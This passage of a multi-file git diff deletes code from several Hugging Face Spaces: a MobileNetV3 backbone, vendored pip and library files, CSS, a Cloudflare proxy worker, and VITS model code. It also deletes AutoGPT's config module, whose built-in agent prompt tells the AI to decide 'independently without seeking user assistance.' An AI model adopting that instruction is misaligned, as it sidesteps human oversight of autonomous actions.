False), - ('inverted_bottleneck', 5, 1, 40, - 'relu', 0.25, 3., False), - ('inverted_bottleneck', 5, 1, 40, - 'relu', 0.25, 3., True), - ('inverted_bottleneck', 3, 2, 80, - 'hard_swish', None, 6., False), - ('inverted_bottleneck', 3, 1, 80, - 'hard_swish', None, 2.5, False), - ('inverted_bottleneck', 3, 1, 80, - 'hard_swish', None, 2.3, False), - ('inverted_bottleneck', 3, 1, 80, - 'hard_swish', None, 2.3, False), - ('inverted_bottleneck', 3, 1, 112, - 'hard_swish', 0.25, 6., False), - ('inverted_bottleneck', 3, 1, 112, - 'hard_swish', 0.25, 6., True), - ('inverted_bottleneck', 5, 2, 160, - 'hard_swish', 0.25, 6., False), - ('inverted_bottleneck', 5, 1, 160, - 'hard_swish', 0.25, 6., False), - ('inverted_bottleneck', 5, 1, 160, - 'hard_swish', 0.25, 6., False), - ('conv_bn', 1, 1, 960, - 'hard_swish', None, None, True), - ] -} - - -SUPPORTED_SPECS_MAP = { - 'MobileNetV3Large': MNV3Large_BLOCK_SPECS, - 'MobileNetV3Small': MNV3Small_BLOCK_SPECS, -} - - -# pylint: disable=invalid-name -def _block_spec_decoder(specs: Mapping[Any, Any], - width_multiplier: float, - divisible_by: int = 8) -> Sequence[Mapping[str, Any]]: - """Decodes specs for a block. - - Args: - specs: A `dict` specification of block specs of a mobilenet version. - width_multiplier: A `float` multiplier for the filter size for all - convolution ops. The value must be greater than zero. Typical usage will - be to set this value in (0, 1) to reduce the number of parameters or - computation cost of the model. - divisible_by: An `int` that ensures all inner dimensions are divisible by - this number. - - Returns: - A list of block spec in dictionary that defines structure of the layers. - """ - - spec_name = specs['spec_name'] - block_spec_schema = specs['block_spec_schema'] - block_specs = specs['block_specs'] - - if not block_specs: - raise ValueError( - 'The block spec cannot be empty for {} !'.format(spec_name)) - - if len(block_specs[0]) != len(block_spec_schema): - raise ValueError('The block spec values {} do not match with ' - 'the schema {}'.format(block_specs[0], block_spec_schema)) - - decoded_specs = [] - - for spec in block_specs: - spec_dict = dict(zip(block_spec_schema, spec)) - decoded_specs.append(spec_dict) - - for ds in decoded_specs: - ds['filters'] = utils.make_divisible( - value=ds['filters'] * width_multiplier, - divisor=divisible_by, - min_value=8) - - return decoded_specs -# pylint: enable=invalid-name - - -class MobileNet(tf.keras.Model): - """Creates a MobileNetV3 family model.""" - - def __init__( - self, - model_id: str = 'MobileNetV3Small', - width_multiplier: float = 1.0, - output_stride: Optional[int] = None, - min_width: int = 8, - divisible_by: int = 8, - regularize_depthwise: bool = False, - bn_layer: Callable[..., Any] = tf.keras.layers.BatchNormalization, - conv_kernel_weight_decay: float = 0.0, - name: str = 'MobilenNetV3'): - """Initializes a MobileNet V3 model. - - Args: - model_id: A `str` of MobileNet version. The supported values are - `MobileNetV3Large`, `MobileNetV3Small`. - width_multiplier: A `float` of multiplier for the filters (number of - channels) for all convolution ops. The value must be greater than zero. - Typical usage will be to set this value in (0, 1) to reduce the number - of parameters or computation cost of the model. - output_stride: An `int` that specifies the requested ratio of input to - output spatial resolution. If not None, then we invoke atrous - convolution if necessary to prevent the network from reducing the - spatial resolution of activation maps. The output_stride should be - divisible by 4. - min_width: An `int` of minimum width (number of channels) for all - convolution ops. Enforced when width_multiplier < 1, and not an active - constraint when width_multiplier >= 1. - divisible_by: An `int` that ensures all intermediate feature dimensions - are divisible by this number. - regularize_depthwise: If True, apply regularization on depthwise conv. - bn_layer: An optional tf.keras.layers.Layer that computes the - normalization (default: tf.keras.layers.BatchNormalization). - conv_kernel_weight_decay: A float, the weight decay for convolution - kernels. - name: Model name. - - Raises: - ValueError: The MobileNet version is not supported. - ValueError: width_multiplier is not greater than zero. - ValueError: Output stride must be None or a multiple of 4. - ValueError: Unknown block type i for layer j. - """ - if model_id not in SUPPORTED_SPECS_MAP: - raise ValueError('The MobileNet version {} ' - 'is not supported'.format(model_id)) - - if width_multiplier <= 0: - raise ValueError('width_multiplier is not greater than zero.') - - if (output_stride is not None and - (output_stride <= 1 or (output_stride > 1 and output_stride % 4))): - raise ValueError('Output stride must be None or a multiple of 4.') - - super().__init__(name=name) - - self._model_id = model_id - self._width_multiplier = width_multiplier - self._min_width = min_width - self._output_stride = output_stride - self._divisible_by = divisible_by - self._regularize_depthwise = regularize_depthwise - self._bn_layer = bn_layer - self._conv_kernel_weight_decay = conv_kernel_weight_decay - self._blocks = [] - self._endpoint_names = [] - - block_specs = SUPPORTED_SPECS_MAP.get(model_id) - self._decoded_specs = _block_spec_decoder( - specs=block_specs, - width_multiplier=self._width_multiplier, - divisible_by=self._divisible_by) - - self._mobilenet_base() - - def _mobilenet_base(self): - """Builds the base MobileNet architecture.""" - - # The current_stride variable keeps track of the output stride of the - # activations, i.e., the running product of convolution strides up to the - # current network layer. This allows us to invoke atrous convolution - # whenever applying the next convolution would result in the activations - # having output stride larger than the target output_stride. - current_stride = 1 - - # The atrous convolution rate parameter. - rate = 1 - - endpoint_level = 1 - in_filters = _INPUT_CHANNELS - for i, block_def in enumerate(self._decoded_specs): - # We only need to build up to 'res5' endpoint for segmentation task. - if endpoint_level > 5 and not self._classification_mode: - break - - block_name = '{}_{}'.format(block_def['block_fn'], i + 1) - - if (self._output_stride is not None and - current_stride == self._output_stride): - # If we have reached the target output_stride, then we need to employ - # atrous convolution with stride=1 and multiply the atrous rate by the - # current unit's stride for use in subsequent layers. - layer_stride = 1 - layer_rate = rate - rate = ( - rate * block_def['strides'] - if block_def['strides'] is not None else rate) - else: - layer_stride = block_def['strides'] - layer_rate = 1 - current_stride = ( - current_stride * block_def['strides'] - if block_def['strides'] is not None else current_stride) - - if block_def['block_fn'] == 'conv_bn': - - self._blocks.append( - convolutions.Conv2DSame( - output_channels=block_def['filters'], - kernel_size=block_def['kernel_size'], - strides=layer_stride, - atrous_rate=layer_rate, - activation=block_def['activation'], - use_bias=False, - bn_layer=self._bn_layer, - use_bn=True, - conv_kernel_weight_decay=self._conv_kernel_weight_decay, - name=block_name, - )) - - elif block_def['block_fn'] == 'inverted_bottleneck': - atrous_rate = 1 - # There is no need to apply atrous convolution to any 1x1 convolution. - if layer_rate > 1 and block_def['kernel_size'] != 1: - atrous_rate = layer_rate - self._blocks.append( - blocks.InvertedBottleneckBlock( - in_filters=in_filters, - out_filters=block_def['filters'], - expand_ratio=block_def['expand_ratio'], - strides=layer_stride, - kernel_size=block_def['kernel_size'], - se_ratio=block_def['se_ratio'], - activation=block_def['activation'], - expand_se_in_filters=True, - depthwise_activation=None, - atrous_rate=atrous_rate, - divisible_by=self._divisible_by, - regularize_depthwise=self._regularize_depthwise, - use_depthwise=True, - # Note that whether the residual connection would be used is - # also conditional on the in_filters and out_filters size, even - # if use_residual=True,e.g. when input_filters != out_filters, - # no residual connection will be created. - use_residual=(block_def['strides'] == 1), - bn_layer=self._bn_layer, - conv_kernel_weight_decay=self._conv_kernel_weight_decay, - name=block_name, - )) - - else: - raise ValueError('Unknown block type {} for layer {}'.format( - block_def['block_fn'], i)) - - # Register input_filters for the next level - in_filters = block_def['filters'] - - if block_def['is_endpoint']: - # Name the endpoint to be 'res{1...5}' to align with ResNet. This - # simplifies segmentation head implementation. - self._endpoint_names.append('res' + str(endpoint_level)) - endpoint_level += 1 - else: - self._endpoint_names.append(None) - - def call(self, input_tensor: tf.Tensor, training: bool = False): - """Performs a forward pass through MobileNet.""" - net = input_tensor - endpoints = {} - for block, endpoint_name in zip(self._blocks, self._endpoint_names): - net = block(net, training=training) - if endpoint_name is not None: - endpoints[endpoint_name] = net - return endpoints - - -def MobileNetV3Small( - width_multiplier: float = 1.0, - output_stride: int = 32, - bn_layer: Callable[..., Any] = tf.keras.layers.BatchNormalization, - conv_kernel_weight_decay: float = 0.0, - name: str = 'MobileNetV3Small') -> tf.keras.Model: - """Creates a MobileNetV3Small model. - - Args: - width_multiplier: A float, depth_multiplier for the whole model. - output_stride: An optional integer specifying the output stride of the - network. - bn_layer: An optional tf.keras.layers.Layer that computes the - normalization (default: tf.keras.layers.BatchNormalization). - conv_kernel_weight_decay: A float, the weight decay for convolution kernels. - name: Model name. - - Returns: - The MobileNetV3Small model as an instance of tf.keras.Model. - """ - model = MobileNet(model_id='MobileNetV3Small', - width_multiplier=width_multiplier, - output_stride=output_stride, - bn_layer=bn_layer, - conv_kernel_weight_decay=conv_kernel_weight_decay, - name=name) - return model - - -def MobileNetV3Large( - width_multiplier: float = 1.0, - output_stride: int = 32, - bn_layer: Callable[..., Any] = tf.keras.layers.BatchNormalization, - conv_kernel_weight_decay: float = 0.0, - name: str = 'MobileNetV3Large') -> tf.keras.Model: - """Creates a MobileNetV3Large model. - - Args: - width_multiplier: A float, depth_multiplier for the STEM. - output_stride: An optional integer specifying the output stride of the - network. - bn_layer: An optional tf.keras.layers.Layer that computes the - normalization (default: tf.keras.layers.BatchNormalization). - conv_kernel_weight_decay: A float, the weight decay for convolution kernels. - name: Model name. - - Returns: - The MobileNetV3Large model as an instance of tf.keras.Model. - """ - model = MobileNet(model_id='MobileNetV3Large', - width_multiplier=width_multiplier, - output_stride=output_stride, - bn_layer=bn_layer, - conv_kernel_weight_decay=conv_kernel_weight_decay, - name=name) - return model diff --git a/spaces/alexray/btc_predictor/venv/lib/python3.10/site-packages/pip/_vendor/cachecontrol/_cmd.py b/spaces/alexray/btc_predictor/venv/lib/python3.10/site-packages/pip/_vendor/cachecontrol/_cmd.py deleted file mode 100644 index 4266b5ee92a24b5e0ef65689a1b94a98bb4a9b56..0000000000000000000000000000000000000000 --- a/spaces/alexray/btc_predictor/venv/lib/python3.10/site-packages/pip/_vendor/cachecontrol/_cmd.py +++ /dev/null @@ -1,61 +0,0 @@ -# SPDX-FileCopyrightText: 2015 Eric Larson -# -# SPDX-License-Identifier: Apache-2.0 - -import logging - -from pip._vendor import requests - -from pip._vendor.cachecontrol.adapter import CacheControlAdapter -from pip._vendor.cachecontrol.cache import DictCache -from pip._vendor.cachecontrol.controller import logger - -from argparse import ArgumentParser - - -def setup_logging(): - logger.setLevel(logging.DEBUG) - handler = logging.StreamHandler() - logger.addHandler(handler) - - -def get_session(): - adapter = CacheControlAdapter( - DictCache(), cache_etags=True, serializer=None, heuristic=None - ) - sess = requests.Session() - sess.mount("http://", adapter) - sess.mount("https://", adapter) - - sess.cache_controller = adapter.controller - return sess - - -def get_args(): - parser = ArgumentParser() - parser.add_argument("url", help="The URL to try and cache") - return parser.parse_args() - - -def main(args=None): - args = get_args() - sess = get_session() - - # Make a request to get a response - resp = sess.get(args.url) - - # Turn on logging - setup_logging() - - # try setting the cache - sess.cache_controller.cache_response(resp.request, resp.raw) - - # Now try to get it - if sess.cache_controller.cached_request(resp.request): - print("Cached!") - else: - print("Not cached :(") - - -if __name__ == "__main__": - main() diff --git a/spaces/alexray/btc_predictor/venv/lib/python3.10/site-packages/pip/_vendor/html5lib/_trie/__init__.py b/spaces/alexray/btc_predictor/venv/lib/python3.10/site-packages/pip/_vendor/html5lib/_trie/__init__.py deleted file mode 100644 index 07bad5d31c1ec7aa7ac081dac5586db91f3c5a99..0000000000000000000000000000000000000000 --- a/spaces/alexray/btc_predictor/venv/lib/python3.10/site-packages/pip/_vendor/html5lib/_trie/__init__.py +++ /dev/null @@ -1,5 +0,0 @@ -from __future__ import absolute_import, division, unicode_literals - -from .py import Trie - -__all__ = ["Trie"] diff --git a/spaces/aliabid94/AutoGPT/autogpt/config/ai_config.py b/spaces/aliabid94/AutoGPT/autogpt/config/ai_config.py deleted file mode 100644 index d50c30beee9dc8009f63415378ae1c6a399f0037..0000000000000000000000000000000000000000 --- a/spaces/aliabid94/AutoGPT/autogpt/config/ai_config.py +++ /dev/null @@ -1,121 +0,0 @@ -# sourcery skip: do-not-use-staticmethod -""" -A module that contains the AIConfig class object that contains the configuration -""" -from __future__ import annotations - -import os -from typing import Type - -import yaml - - -class AIConfig: - """ - A class object that contains the configuration information for the AI - - Attributes: - ai_name (str): The name of the AI. - ai_role (str): The description of the AI's role. - ai_goals (list): The list of objectives the AI is supposed to complete. - """ - - def __init__( - self, ai_name: str = "", ai_role: str = "", ai_goals: list | None = None - ) -> None: - """ - Initialize a class instance - - Parameters: - ai_name (str): The name of the AI. - ai_role (str): The description of the AI's role. - ai_goals (list): The list of objectives the AI is supposed to complete. - Returns: - None - """ - if ai_goals is None: - ai_goals = [] - self.ai_name = ai_name - self.ai_role = ai_role - self.ai_goals = ai_goals - - # Soon this will go in a folder where it remembers more stuff about the run(s) - SAVE_FILE = os.path.join(os.path.dirname(__file__), "..", "ai_settings.yaml") - - @staticmethod - def load(config_file: str = SAVE_FILE) -> "AIConfig": - """ - Returns class object with parameters (ai_name, ai_role, ai_goals) loaded from - yaml file if yaml file exists, - else returns class with no parameters. - - Parameters: - config_file (int): The path to the config yaml file. - DEFAULT: "../ai_settings.yaml" - - Returns: - cls (object): An instance of given cls object - """ - - try: - with open(config_file, encoding="utf-8") as file: - config_params = yaml.load(file, Loader=yaml.FullLoader) - except FileNotFoundError: - config_params = {} - - ai_name = config_params.get("ai_name", "") - ai_role = config_params.get("ai_role", "") - ai_goals = config_params.get("ai_goals", []) - # type: Type[AIConfig] - return AIConfig(ai_name, ai_role, ai_goals) - - def save(self, config_file: str = SAVE_FILE) -> None: - """ - Saves the class parameters to the specified file yaml file path as a yaml file. - - Parameters: - config_file(str): The path to the config yaml file. - DEFAULT: "../ai_settings.yaml" - - Returns: - None - """ - - config = { - "ai_name": self.ai_name, - "ai_role": self.ai_role, - "ai_goals": self.ai_goals, - } - with open(config_file, "w", encoding="utf-8") as file: - yaml.dump(config, file, allow_unicode=True) - - def construct_full_prompt(self) -> str: - """ - Returns a prompt to the user with the class information in an organized fashion. - - Parameters: - None - - Returns: - full_prompt (str): A string containing the initial prompt for the user - including the ai_name, ai_role and ai_goals. - """ - - prompt_start = ( - "Your decisions must always be made independently without" - " seeking user assistance. Play to your strengths as an LLM and pursue" - " simple strategies with no legal complications." - "" - ) - - from autogpt.prompt import get_prompt - - # Construct full prompt - full_prompt = ( - f"You are {self.ai_name}, {self.ai_role}\n{prompt_start}\n\nGOALS:\n\n" - ) - for i, goal in enumerate(self.ai_goals): - full_prompt += f"{i+1}. {goal}\n" - - full_prompt += f"\n\n{get_prompt()}" - return full_prompt diff --git a/spaces/amarchheda/ChordDuplicate/portaudio/src/hostapi/wasapi/mingw-include/winapifamily.h b/spaces/amarchheda/ChordDuplicate/portaudio/src/hostapi/wasapi/mingw-include/winapifamily.h deleted file mode 100644 index 388d5f068cba2b5e2e642f68bea924d61f37f404..0000000000000000000000000000000000000000 --- a/spaces/amarchheda/ChordDuplicate/portaudio/src/hostapi/wasapi/mingw-include/winapifamily.h +++ /dev/null @@ -1,24 +0,0 @@ -/** - * This file is part of the mingw-w64 runtime package. - * No warranty is given; refer to the file DISCLAIMER within this package. - */ - -#ifndef _INC_WINAPIFAMILY -#define _INC_WINAPIFAMILY - -#define WINAPI_PARTITION_DESKTOP 0x1 -#define WINAPI_PARTITION_APP 0x2 - -#define WINAPI_FAMILY_APP WINAPI_PARTITION_APP -#define WINAPI_FAMILY_DESKTOP_APP (WINAPI_PARTITION_DESKTOP \ - | WINAPI_PARTITION_APP) - -/* WINAPI_FAMILY can be either desktop + App, or App. */ -#ifndef WINAPI_FAMILY -#define WINAPI_FAMILY WINAPI_FAMILY_DESKTOP_APP -#endif - -#define WINAPI_FAMILY_PARTITION(v) ((WINAPI_FAMILY & v) == v) -#define WINAPI_FAMILY_ONE_PARTITION(vset, v) ((WINAPI_FAMILY & vset) == v) - -#endif diff --git a/spaces/anen/DentalGPT/style.css b/spaces/anen/DentalGPT/style.css deleted file mode 100644 index 114adf441e9032febb46bc056b2a8bb651075f0d..0000000000000000000000000000000000000000 --- a/spaces/anen/DentalGPT/style.css +++ /dev/null @@ -1,28 +0,0 @@ -body { - padding: 2rem; - font-family: -apple-system, BlinkMacSystemFont, "Arial", sans-serif; -} - -h1 { - font-size: 16px; - margin-top: 0; -} - -p { - color: rgb(107, 114, 128); - font-size: 15px; - margin-bottom: 10px; - margin-top: 5px; -} - -.card { - max-width: 620px; - margin: 0 auto; - padding: 16px; - border: 1px solid lightgray; - border-radius: 16px; -} - -.card p:last-child { - margin-bottom: 0; -} diff --git a/spaces/antonovmaxim/text-generation-webui-space/css/main.css b/spaces/antonovmaxim/text-generation-webui-space/css/main.css deleted file mode 100644 index b87053bef0688b990a45864739a01a4f3d79aafd..0000000000000000000000000000000000000000 --- a/spaces/antonovmaxim/text-generation-webui-space/css/main.css +++ /dev/null @@ -1,117 +0,0 @@ -.tabs.svelte-710i53 { - margin-top: 0 -} - -.py-6 { - padding-top: 2.5rem -} - -.dark #refresh-button { - background-color: #ffffff1f; -} - -#refresh-button { - flex: none; - margin: 0; - padding: 0; - min-width: 50px; - border: none; - box-shadow: none; - border-radius: 10px; - background-color: #0000000d; -} - -#download-label, #upload-label { - min-height: 0 -} - -#accordion { -} - -.dark svg { - fill: white; -} - -.dark a { - color: white !important; - text-decoration: none !important; -} - -ol li p, ul li p { - display: inline-block; -} - -#main, #parameters, #chat-settings, #interface-mode, #lora, #training-tab, #model-tab { - border: 0; -} - -.gradio-container-3-18-0 .prose * h1, h2, h3, h4 { - color: white; -} - -.gradio-container { - max-width: 100% !important; - padding-top: 0 !important; -} - -#extensions { - padding: 15px; - margin-bottom: 35px; -} - -.extension-tab { - border: 0 !important; -} - -span.math.inline { - font-size: 27px; - vertical-align: baseline !important; -} - -div.svelte-15lo0d8 > *, div.svelte-15lo0d8 > .form > * { - flex-wrap: nowrap; -} - -.header_bar { - background-color: #f7f7f7; - margin-bottom: 40px; -} - -.dark .header_bar { - border: none !important; - background-color: #8080802b; -} - -.textbox_default textarea { - height: calc(100vh - 391px); -} - -.textbox_default_output textarea { - height: calc(100vh - 210px); -} - -.textbox textarea { - height: calc(100vh - 261px); -} - -.textbox_default textarea, .textbox_default_output textarea, .textbox textarea { - font-size: 16px !important; - color: #46464A !important; -} - -.dark textarea { - color: #efefef !important; -} - -/* Hide the gradio footer*/ -footer { - display: none !important; -} - -button { - font-size: 14px !important; -} - -.small-button { - max-width: 171px; -} \ No newline at end of file diff --git a/spaces/arch-123/bingo/cloudflare/worker.js b/spaces/arch-123/bingo/cloudflare/worker.js deleted file mode 100644 index e0debd750615f1329b2c72fbce73e1b9291f7137..0000000000000000000000000000000000000000 --- a/spaces/arch-123/bingo/cloudflare/worker.js +++ /dev/null @@ -1,18 +0,0 @@ -const TRAGET_HOST='hf4all-bingo.hf.space' // 请将此域名改成你自己的,域名信息在设置》站点域名查看。 - -export default { - async fetch(request) { - const uri = new URL(request.url); - if (uri.protocol === 'http:') { - uri.protocol = 'https:'; - return new Response('', { - status: 301, - headers: { - location: uri.toString(), - }, - }) - } - uri.host = TRAGET_HOST - return fetch(new Request(uri.toString(), request)); - }, -}; diff --git a/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/altair/utils/__init__.py b/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/altair/utils/__init__.py deleted file mode 100644 index 2a52383457408f121c06fb716f6a4865f001b98d..0000000000000000000000000000000000000000 --- a/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/altair/utils/__init__.py +++ /dev/null @@ -1,32 +0,0 @@ -from .core import ( - infer_vegalite_type, - infer_encoding_types, - sanitize_dataframe, - parse_shorthand, - use_signature, - update_subtraits, - update_nested, - display_traceback, - SchemaBase, - Undefined, -) -from .html import spec_to_html -from .plugin_registry import PluginRegistry -from .deprecation import AltairDeprecationWarning - - -__all__ = ( - "infer_vegalite_type", - "infer_encoding_types", - "sanitize_dataframe", - "spec_to_html", - "parse_shorthand", - "use_signature", - "update_subtraits", - "update_nested", - "display_traceback", - "AltairDeprecationWarning", - "SchemaBase", - "Undefined", - "PluginRegistry", -) diff --git a/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/anyio/abc/__init__.py b/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/anyio/abc/__init__.py deleted file mode 100644 index 72c44449a9354554973022b2466f84faf5353f24..0000000000000000000000000000000000000000 --- a/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/anyio/abc/__init__.py +++ /dev/null @@ -1,88 +0,0 @@ -__all__ = ( - "AsyncResource", - "IPAddressType", - "IPSockAddrType", - "SocketAttribute", - "SocketStream", - "SocketListener", - "UDPSocket", - "UNIXSocketStream", - "UDPPacketType", - "ConnectedUDPSocket", - "UnreliableObjectReceiveStream", - "UnreliableObjectSendStream", - "UnreliableObjectStream", - "ObjectReceiveStream", - "ObjectSendStream", - "ObjectStream", - "ByteReceiveStream", - "ByteSendStream", - "ByteStream", - "AnyUnreliableByteReceiveStream", - "AnyUnreliableByteSendStream", - "AnyUnreliableByteStream", - "AnyByteReceiveStream", - "AnyByteSendStream", - "AnyByteStream", - "Listener", - "Process", - "Event", - "Condition", - "Lock", - "Semaphore", - "CapacityLimiter", - "CancelScope", - "TaskGroup", - "TaskStatus", - "TestRunner", - "BlockingPortal", -) - -from typing import Any - -from ._resources import AsyncResource -from ._sockets import ( - ConnectedUDPSocket, - IPAddressType, - IPSockAddrType, - SocketAttribute, - SocketListener, - SocketStream, - UDPPacketType, - UDPSocket, - UNIXSocketStream, -) -from ._streams import ( - AnyByteReceiveStream, - AnyByteSendStream, - AnyByteStream, - AnyUnreliableByteReceiveStream, - AnyUnreliableByteSendStream, - AnyUnreliableByteStream, - ByteReceiveStream, - ByteSendStream, - ByteStream, - Listener, - ObjectReceiveStream, - ObjectSendStream, - ObjectStream, - UnreliableObjectReceiveStream, - UnreliableObjectSendStream, - UnreliableObjectStream, -) -from ._subprocesses import Process -from ._tasks import TaskGroup, TaskStatus -from ._testing import TestRunner - -# Re-exported here, for backwards compatibility -# isort: off -from .._core._synchronization import CapacityLimiter, Condition, Event, Lock, Semaphore -from .._core._tasks import CancelScope -from ..from_thread import BlockingPortal - -# Re-export imports so they look like they live directly in this package -key: str -value: Any -for key, value in list(locals().items()): - if getattr(value, "__module__", "").startswith("anyio.abc."): - value.__module__ = __name__ diff --git a/spaces/arxnov/anotest/models.py b/spaces/arxnov/anotest/models.py deleted file mode 100644 index 7dcd22edf811b952514080f5f06cc43d635ead28..0000000000000000000000000000000000000000 --- a/spaces/arxnov/anotest/models.py +++ /dev/null @@ -1,542 +0,0 @@ -import math -import torch -from torch import nn -from torch.nn import functional as F - -import commons -import modules -import attentions - -from torch.nn import Conv1d, ConvTranspose1d, Conv2d -from torch.nn.utils import weight_norm, remove_weight_norm, spectral_norm -from commons import init_weights, get_padding - - -class StochasticDurationPredictor(nn.Module): - def __init__(self, in_channels, filter_channels, kernel_size, p_dropout, n_flows=4, gin_channels=0): - super().__init__() - filter_channels = in_channels # it needs to be removed from future version. - self.in_channels = in_channels - self.filter_channels = filter_channels - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.n_flows = n_flows - self.gin_channels = gin_channels - - self.log_flow = modules.Log() - self.flows = nn.ModuleList() - self.flows.append(modules.ElementwiseAffine(2)) - for i in range(n_flows): - self.flows.append(modules.ConvFlow(2, filter_channels, kernel_size, n_layers=3)) - self.flows.append(modules.Flip()) - - self.post_pre = nn.Conv1d(1, filter_channels, 1) - self.post_proj = nn.Conv1d(filter_channels, filter_channels, 1) - self.post_convs = modules.DDSConv(filter_channels, kernel_size, n_layers=3, p_dropout=p_dropout) - self.post_flows = nn.ModuleList() - self.post_flows.append(modules.ElementwiseAffine(2)) - for i in range(4): - self.post_flows.append(modules.ConvFlow(2, filter_channels, kernel_size, n_layers=3)) - self.post_flows.append(modules.Flip()) - - self.pre = nn.Conv1d(in_channels, filter_channels, 1) - self.proj = nn.Conv1d(filter_channels, filter_channels, 1) - self.convs = modules.DDSConv(filter_channels, kernel_size, n_layers=3, p_dropout=p_dropout) - if gin_channels != 0: - self.cond = nn.Conv1d(gin_channels, filter_channels, 1) - - def forward(self, x, x_mask, w=None, g=None, reverse=False, noise_scale=1.0): - x = torch.detach(x) - x = self.pre(x) - if g is not None: - g = torch.detach(g) - x = x + self.cond(g) - x = self.convs(x, x_mask) - x = self.proj(x) * x_mask - - if not reverse: - flows = self.flows - assert w is not None - - logdet_tot_q = 0 - h_w = self.post_pre(w) - h_w = self.post_convs(h_w, x_mask) - h_w = self.post_proj(h_w) * x_mask - e_q = torch.randn(w.size(0), 2, w.size(2)).to(device=x.device, dtype=x.dtype) * x_mask - z_q = e_q - for flow in self.post_flows: - z_q, logdet_q = flow(z_q, x_mask, g=(x + h_w)) - logdet_tot_q += logdet_q - z_u, z1 = torch.split(z_q, [1, 1], 1) - u = torch.sigmoid(z_u) * x_mask - z0 = (w - u) * x_mask - logdet_tot_q += torch.sum((F.logsigmoid(z_u) + F.logsigmoid(-z_u)) * x_mask, [1,2]) - logq = torch.sum(-0.5 * (math.log(2*math.pi) + (e_q**2)) * x_mask, [1,2]) - logdet_tot_q - - logdet_tot = 0 - z0, logdet = self.log_flow(z0, x_mask) - logdet_tot += logdet - z = torch.cat([z0, z1], 1) - for flow in flows: - z, logdet = flow(z, x_mask, g=x, reverse=reverse) - logdet_tot = logdet_tot + logdet - nll = torch.sum(0.5 * (math.log(2*math.pi) + (z**2)) * x_mask, [1,2]) - logdet_tot - return nll + logq # [b] - else: - flows = list(reversed(self.flows)) - flows = flows[:-2] + [flows[-1]] # remove a useless vflow - z = torch.randn(x.size(0), 2, x.size(2)).to(device=x.device, dtype=x.dtype) * noise_scale - for flow in flows: - z = flow(z, x_mask, g=x, reverse=reverse) - z0, z1 = torch.split(z, [1, 1], 1) - logw = z0 - return logw - - -class DurationPredictor(nn.Module): - def __init__(self, in_channels, filter_channels, kernel_size, p_dropout, gin_channels=0): - super().__init__() - - self.in_channels = in_channels - self.filter_channels = filter_channels - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.gin_channels = gin_channels - - self.drop = nn.Dropout(p_dropout) - self.conv_1 = nn.Conv1d(in_channels, filter_channels, kernel_size, padding=kernel_size//2) - self.norm_1 = modules.LayerNorm(filter_channels) - self.conv_2 = nn.Conv1d(filter_channels, filter_channels, kernel_size, padding=kernel_size//2) - self.norm_2 = modules.LayerNorm(filter_channels) - self.proj = nn.Conv1d(filter_channels, 1, 1) - - if gin_channels != 0: - self.cond = nn.Conv1d(gin_channels, in_channels, 1) - - def forward(self, x, x_mask, g=None): - x = torch.detach(x) - if g is not None: - g = torch.detach(g) - x = x + self.cond(g) - x = self.conv_1(x * x_mask) - x = torch.relu(x) - x = self.norm_1(x) - x = self.drop(x) - x = self.conv_2(x * x_mask) - x = torch.relu(x) - x = self.norm_2(x) - x = self.drop(x) - x = self.proj(x * x_mask) - return x * x_mask - - -class TextEncoder(nn.Module): - def __init__(self, - n_vocab, - out_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - emotion_embedding): - super().__init__() - self.n_vocab = n_vocab - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.emotion_embedding = emotion_embedding - - if self.n_vocab!=0: - self.emb = nn.Embedding(n_vocab, hidden_channels) - if emotion_embedding: - self.emotion_emb = nn.Linear(1024, hidden_channels) - nn.init.normal_(self.emb.weight, 0.0, hidden_channels**-0.5) - - self.encoder = attentions.Encoder( - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout) - self.proj= nn.Conv1d(hidden_channels, out_channels * 2, 1) - - def forward(self, x, x_lengths, emotion_embedding=None): - if self.n_vocab!=0: - x = self.emb(x) * math.sqrt(self.hidden_channels) # [b, t, h] - if emotion_embedding is not None: - x = x + self.emotion_emb(emotion_embedding.unsqueeze(1)) - x = torch.transpose(x, 1, -1) # [b, h, t] - x_mask = torch.unsqueeze(commons.sequence_mask(x_lengths, x.size(2)), 1).to(x.dtype) - - x = self.encoder(x * x_mask, x_mask) - stats = self.proj(x) * x_mask - - m, logs = torch.split(stats, self.out_channels, dim=1) - return x, m, logs, x_mask - - -class ResidualCouplingBlock(nn.Module): - def __init__(self, - channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - n_flows=4, - gin_channels=0): - super().__init__() - self.channels = channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.n_flows = n_flows - self.gin_channels = gin_channels - - self.flows = nn.ModuleList() - for i in range(n_flows): - self.flows.append(modules.ResidualCouplingLayer(channels, hidden_channels, kernel_size, dilation_rate, n_layers, gin_channels=gin_channels, mean_only=True)) - self.flows.append(modules.Flip()) - - def forward(self, x, x_mask, g=None, reverse=False): - if not reverse: - for flow in self.flows: - x, _ = flow(x, x_mask, g=g, reverse=reverse) - else: - for flow in reversed(self.flows): - x = flow(x, x_mask, g=g, reverse=reverse) - return x - - -class PosteriorEncoder(nn.Module): - def __init__(self, - in_channels, - out_channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=0): - super().__init__() - self.in_channels = in_channels - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.gin_channels = gin_channels - - self.pre = nn.Conv1d(in_channels, hidden_channels, 1) - self.enc = modules.WN(hidden_channels, kernel_size, dilation_rate, n_layers, gin_channels=gin_channels) - self.proj = nn.Conv1d(hidden_channels, out_channels * 2, 1) - - def forward(self, x, x_lengths, g=None): - x_mask = torch.unsqueeze(commons.sequence_mask(x_lengths, x.size(2)), 1).to(x.dtype) - x = self.pre(x) * x_mask - x = self.enc(x, x_mask, g=g) - stats = self.proj(x) * x_mask - m, logs = 